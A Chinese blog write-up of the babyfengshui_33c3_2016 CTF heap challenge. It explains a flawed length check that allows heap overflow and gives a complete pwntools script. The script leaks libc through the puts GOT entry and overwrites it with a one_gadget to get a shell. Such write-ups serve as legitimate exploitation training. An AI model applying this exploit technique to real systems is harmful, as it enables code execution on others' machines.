【pwn】 33c32016_babyfengshui

最新推荐文章于 2024-01-24 03:30:33 发布
原创 最新推荐文章于 2024-01-24 03:30:33 发布 · 339 阅读 · 0 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文分析了一个程序中关于堆溢出的漏洞,通过创建和释放note来操纵chunk,当两个chunk不相邻时导致堆溢出,并利用此进行gothijack攻击。

例行检查
在这里插入图片描述分析程序,注意到在输入内容的时候,输入限制是这样的。

    if ( (char *)(v3 + *(_DWORD *)*(&ptr + a1)) >= (char *)*(&ptr + a1) - 4 )
    {
      puts("my l33t defenses cannot be fooled, cya!");
      exit(1);
    }

意思是上一块的chunk的数据开始加上输入字符串的长度,不能超过下一个chunk的size字段。这个check在两个chunk相邻时是有效的,但是如果两个chunk不相邻时就会有问题,会造成堆溢出。

步骤
1.创建两个note(4个chunk)
2.free掉第一个note,2个chunk会合并。
3.创建大小为第一个note两个chunk之和,这样这个note两个chunk就会被第二个note隔开,于是可以溢出到第二个note。
4.gothijack

from pwn import *

io=remote('node3.buuoj.cn',27159)

def add(size,name,len,data):
    io.recvuntil('Action: ')
    io.sendline('0')
    io.recvuntil('description: ')
    io.sendline(str(size))
    io.recvuntil('name: ')
    io.sendline(name)
    io.recvuntil('length: ')
    io.sendline(str(len))
    io.recvuntil('text: ')
    io.sendline(data)

def free(idx):
    io.recvuntil('Action: ')
    io.sendline('1')
    io.recvuntil('index: ')
    io.sendline(str(idx))

def edit(idx,len,data):
    io.recvuntil('Action: ')
    io.sendline('3')
    io.recvuntil('index: ')
    io.sendline(str(idx))   
    io.recvuntil('length: ')
    io.sendline(str(len))
    io.recvuntil('text: ')
    io.sendline(data)

def show(idx):
    io.recvuntil('Action: ')
    io.sendline('2')
    io.recvuntil('index: ')
    io.sendline(str(idx))       

puts_got=0x804B024

add(0x80,'ydh',0x10,'aaaa\n')#0
add(0x10,'ydh',0x10,'bbbb\n')#1
free(0)
add(0x108,'ydh',0x150,'a'*0x124+p32(0x81)+p32(puts_got))
show(1)
io.recvuntil('description: ')
puts_add=u32(io.recv(4))
print(hex(puts_add))
libc_base=puts_add-0x05f140
one_gadget=libc_base+0x3a80c

edit(1,10,p32(one_gadget))

io.interactive()
【CTF】【PWN】胎教向babyfengshui_33c3_2016题解
m0_50819561的博客
10-12 452
跳过checksec,我们直接分析程序。 我这里把这些函数命名为add,delete,display,edit。 先看add。 就是创建两个chunk,一个的地址存放在s里,一个的地址存放在v2里。 然后把s存在v2指向的地址里,用一个名为ptr的数组存放v2。 可以看出来,我们创建了两个chunk。按顺序命名为chunk1和chunk2.我们把这两个chunk看作是一个user的两部分。显然,chunk1存放了user的内容,chunk2存放了user的内容的地址和user的名字。 其中name
babyfengshui [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列23
重新启程
12-26 1001
题目地址:babyfengshui 这个题目是高手进阶区的第12题。本题的主要考点是堆溢出,现在ctf主要的考点都已经转移到了堆溢出了,这个题目作为堆溢出的基础题目,还是很容易入门的。 先看看题目 惯例检查一下保护机制: [*] '/ctf/work/python/babyfengshui/babyfengshui' Arch: i386-32-little RE...
[BUUCTF]-PWN:babyfengshui_33c3_2016解析
2301_79326813的博客
01-24 924
又是一道堆题,先看保护关键信息是32位,没开pie直接看ida大致是alloc创建堆块,free释放堆块,show查看堆块内容,fill填充堆块内容其他的都没啥关键的要讲,但alloc那里非常需要解析一下解释如上图再具体一点就是 我们输入的字节大小+堆块地址>=相邻0x80堆块的地址时会被强制退出必须要 我们输入的字节大小+堆块地址
攻防世界PWNBabyfengshui题解
seaaseesa的博客
11-06 1194
本题,首先,为了方便调试,我们需要解决alarm clock问题 程序运行几十秒后就会自动退出,所以,为了方便调试,我们需要先修改一下这个二进制 我们用十六进制编辑器把这几个指令nop(0x90)掉即可 然后,我们就开始做题了 查看创建功能的函数 这里创建了两个堆,第一个堆用来存储description,第二个堆用来存储第一个堆的指针以及name字符串 其数据...
[pwn]堆:堆风水与堆排布-babyfengshui
热门推荐
Breeze的博客
12-31 1万+
[pwn]堆:堆风水与堆排布-babyfengshui 所谓堆风水也叫作堆排布,其实说严格了并不是一种漏洞的利用方法,而是一种灵活布置堆块来控制堆布局的方法,在一些一些其他漏洞的利用中起到效果。通过一道经典的题目,由清华蓝莲花战队出的babyfengshui来看一下: babyfengshui 查看安全策略 没开PIE,但值得一提的是这是一个32位的程序,32位的堆是4字节对齐的。 查看程序逻辑 ...
babyfengshui-堆溢出
playmaker的博客
07-31 307
babyfengshui-堆溢出 题目是一个32位的选单式程序,大致功能和保护如下 逐一分析各个功能,首先是Add_user部分 printf("size of description: "); __isoc99_scanf("%u%c", &v2, &v0); sub_8048816(v2); _DWORD *__cdecl sub_80...
攻防世界 pwn进阶区----No.012 babyfengshui 解题思路
qq_29185043的博客
10-25 470
攻防世界 pwn进阶区----No.012 babyfengshui 解题思路 1.本题解题思路 1.先期工作 1.运行程序查看基本逻辑 创建用户 展示用户 更新用户 删除用户 到这里就可以猜测这题有可能堆上的题,重点查看删除堆的指针情况,以及堆溢出的情况。 2.运用checksec查看程序的保护措施 没有开启地址随...
(攻防世界)(pwnbabyfengshui
PLpa的博客
08-03 1408
入门级的堆题,拿来学习还是不错的。 做这道题之前,最好还是先对堆的数据结构有一定的了解。 拿到题目,下载附件,查看保护。 一个32位的程序,开了NX和Canary保护,这都不是重头戏毕竟这题不用栈,栈保护只是锦上添花罢了。 把文件拖进IDA查看逻辑: 可以看到,典型的菜单题,这很pwn,实现了增删改查四个功能,像极了C语言程序设计的期末结业程序设计题哈哈哈,暴露年龄。 进入增加用户功能: 可...
babyfengshui__BUUCTF
Jc
09-29 698
其实这个题用了两天,第一天拿上题的时候比较浮躁,也没什么分析的效果,把题做出来了,写个文章大家分析交流 我看网上大家都说这个题适合入门堆得看,其实我感觉要是没接触过堆得话,理解起来还是比较困难的,我会将自己做题的思路记录下来,让大家少踩点坑 做题思路 1.查看安全机制/文件信息 2.分析IDA,梳理思路很重要 3.分析构造漏洞利用(其实自己都是一步步来的,毕竟还是个小白呢) 4.编写EXP文件 安...
pwn 堆溢出之 泄露基址
qq_41071646的博客
04-25 3485
先声明一下本文的参考链接 https://blog.csdn.net/weixin_34050005/article/details/86881709?tdsourcetag=s_pctim_aiomsg 这篇博客写的非常好 受教了 本来其实我是看的另一道题 但是那道题 感觉并不是很适合我这种萌新 然后我就看到了这道题 就 由于这个篇文章写的很清楚 而且 代码直接就可以拿到f...
攻防世界babyfengshui解题思路
aptx4869_li的博客
02-02 372
解题思路 基本信息查询 healer@healer:~/Documents/CTF/PWN/babyfengshui$ readelf -h babyfengshui ELF Header: Magic: 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 Class: ELF32 Data: 2's complement, litt
babyfengshui 堆溢出的入门题
qq_41071646的博客
02-11 1844
本文 参考资料 https://github.com/firmianay/CTF-All-In-One 感谢 作者的 无私奉献 若是侵权 请联系 本人 本人会修改或删除 这道题 其实我也是看这篇文章才撸会的 怎么说呢 这个题 本来 我也是有点迷糊的 补了一些 堆溢出的资料 就懂了许多 这里我是结合资料 来写的 本人也是一个菜虾 要是哪里不对 还请指教 ...
(攻防世界)(pwn)(RCTF2017)Recho
PLpa的博客
09-07 2433
0x00.前言 又是一题栈溢出题,但是又有一点点不同。。。 0x01.程序逻辑 程序保护: 程序只开了NX保护,堆栈不可执行。 进入IDA 程序让你先输入你将要输入的字符串长度,然后继续让你输入字符串。 最后,程序会输出你输入的字符串。 看起来,这很像一般的栈溢出,甚至我们可以通过程序的输出把一些敏感的地址给输出出来。 更加让人欣喜的是,这个程序好像给了什么不得了的东西。 0x02.奇怪的东西...
ISCC2018 Reverse & Pwn writeup
aoque9909的博客
05-29 790
Reference:L1B0 Re RSA256 春秋欢乐赛原题。。flag都不变的 给了三个加密文件和公钥证书public.key,可以使用openssl进行处理 $openssl rsa -pubin -text -modulus -in ./public.key Public-Key: (256 bit) Modulus: 00:d9:9e:...
XCTF PWN高手进阶区 之 js
neuisf的博客
01-28 377
本题程序名为js,随便输入字符串,发现: 输入字符串会打印该字符串; 输入数字时会以科学计数法打印该数字; 输入加法算式会打印加法计算结果; 输入!1会打印false,输入!0会打印true; 输入js_fuck的命令: 提示eval函数执行时引用错误。 因此,推断程序执行是以输入为参数,调用eval运行。 于是: 输入print,打印print函数: 输入read,打印read函数: 1...
Hitcon 2016 Pwn赛题学习
weixin_30553777的博客
04-26 412
PS:这是我很久以前写的,大概是去年刚结束Hitcon2016时写的。写完之后就丢在硬盘里没管了,最近翻出来才想起来写过这个,索性发出来 0x0 前言 Hitcon个人感觉是高质量的比赛,相比国内的CTF,Hitcon的题目内容更新,往往会出现一些以前从未从题目中出现过的姿势。同时观察一些CTF也可以发现,往往都是国外以及台湾的CTF中首先出现的姿势,然后一段时间后才会被国内的CTF学习到。 此次...
BUUCTF pwn babyfengshui_33c3_2016(简单堆)
菜的只能随便写写博客
02-17 2224
0x01 文件分析   0x02 运行  程序提供了几个简单的功能,增删改查都有。运行的时候程序有定时机制,可以用IDA的patch功能修改二进制指令,消除定时。   0x03 静态分析 主函数: void __cdecl __noreturn main() { char v0; // [esp+3h] [ebp-15h] int v1; // [esp+4h] [ebp-14h] ...
pwn100 [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列16
重新启程
12-23 1462
题目地址:pwn100 本题已经是高手进阶区的第五题了,难度也在不断加大。需要补充的知识点也越来越多了。 废话不说,看看题目 没什么建议和描述,那就先下载附件,看看保护机制 root@mypwn:/ctf/work/python/pwn-100# checksec d0b5f9b486bb480c9035839ec896252e [*] '/ctf/work/python/pwn-10...
(攻防世界)(2016 L-CTF)pwn100
PLpa的博客
07-12 2636
这题也是一个DynELF()的栈溢出题,不过这里是运用了puts函数而不是write函数,所以我们构造的leak函数就要不同些。 拿到题目,我们首先查看一下保护: 可以看到,程序只开启了NX保护。 我们进入IDA看一下程序逻辑,找一找漏洞: 我们找到了puts和read函数,看到了明显的栈溢出漏洞,一般思路就是DynELF函数的利用了: 我们找到我们需要的一些地址,然后开始构造exp: #!...
babyfengshui(xctf)
weixin_43868725的博客
08-21 275
0x0 程序保护和流程 保护: 流程: main() add_user() 连续分配了两个堆块,并将第一次分配的堆块的指针存入第二次分配的堆块的fd字段,bk字段开始存放name,之后调用了update_user() 输入完length之后要经过判断,需要第一次分配的堆块的数据段的地址加上输入的长度的值必须小于第二次分配的堆块的数据段的地址减4的值才能输入text。 delete_user() 根据索引分别释放两个堆块,再将指向第二次分配堆块的指针清零。 display_user() 根据索引输
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值